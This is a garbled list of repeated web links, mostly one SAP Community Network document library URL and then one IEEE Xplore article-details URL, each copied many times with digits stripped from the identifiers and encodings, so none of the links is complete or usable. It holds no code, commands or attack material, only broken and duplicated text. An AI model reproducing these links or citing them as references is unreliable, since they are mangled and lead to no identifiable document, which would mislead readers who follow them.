http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b 
?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& 
http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b 
?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& 
http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b 
?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d 
http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% 
farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% 